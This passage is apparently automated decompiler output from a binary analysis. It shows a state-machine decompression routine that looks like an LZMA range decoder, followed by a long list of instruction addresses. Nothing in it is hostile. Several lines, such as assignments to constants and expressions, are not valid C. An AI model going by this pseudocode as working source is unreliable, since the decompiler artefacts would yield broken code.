								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406bc0
0x00406bc7
0x00406bcd
0x00406bd3
0x00000000
0x00406bd7
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c0e
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c59
0x00406c5c
0x00406c84
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c76
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406ccd
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cef
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d35
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073dd
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x00407413
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743b
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406dcf
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
